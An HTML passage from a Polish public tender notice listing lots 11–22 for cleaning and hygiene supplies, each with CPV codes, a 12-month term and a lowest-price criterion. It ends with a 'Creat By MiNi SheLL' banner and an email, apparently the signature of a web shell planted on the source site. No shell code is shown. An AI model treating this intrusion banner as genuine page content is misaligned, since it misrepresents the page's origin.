<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków do czyszczenia podłóg. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa srodków czyszczących i polerujących. Szczegółowy opis przedmiotu zamowienia zawarty jest w załaczniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czyszczących. Szczegółowy opis przedmiotu zam ówienia zawarty jest w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czyszczących. Szczegółowy opis przedmiotu zamówienia zawiera załacznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Srodki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czyszczących. Szczegółowy opis przedmiotu zamówienia zawarty jest w załaczniku nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa produktów do pielęgnacji skóry. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Śridki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa art. do sprzatania w gospodarstwie domowym. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.43.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieluszek dla niemowlat, pioeluchomajtek dla dorosłych. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.77.12.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Srodki czystosci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa myjek rękawic typu manopla j.u. Szczegółowy opis przedmiotu zamówienia zawiera załacznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jednorazowych worków na wymiociny. Szczegółowy opis przedmiotu zamówienia zawiera załacznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jednorazowych szczoteczek do rąk. Szczególowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru toaletowego. Szczegółwy opis przedmiotu zamówienia zawarty jest w załaczniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.76.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com